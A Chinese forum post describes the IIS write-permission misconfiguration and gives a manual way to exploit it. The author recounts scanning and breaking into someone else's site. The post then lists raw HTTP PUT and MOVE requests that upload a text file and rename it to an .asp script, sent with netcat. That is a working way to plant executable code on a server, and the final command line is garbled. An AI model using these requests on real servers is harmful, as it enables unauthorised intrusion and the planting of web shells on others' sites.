IIS写权限漏洞原理&利用工具手动版
很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug。八百年遇不到一会,结果前几天不幸碰上了。用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜JSKY用的参数一定是“/”)。
还好,最后搞进去把人家的站恢复了,真惊险。还义务帮他补漏洞,删后门......
其中用到了IIS写权限利用工具,桂林老兵版的没带身上,网上下到了zwell版的,结果没成功,最后自己动手写了一个手动版的,看来还是“自己动手,丰衣足食”哇,呼呼。
分别保存下面两个TXT文件。
//PUT.TXT
PUT /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Content-Length: 24
//MOVE.TXT
MOVE /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp
(别忘了上面有两下回车)
然后在CMD分别输入以下命令即可:
c:\>nc www.xxx.com 80nc www.xxx.com 80
页:
[1]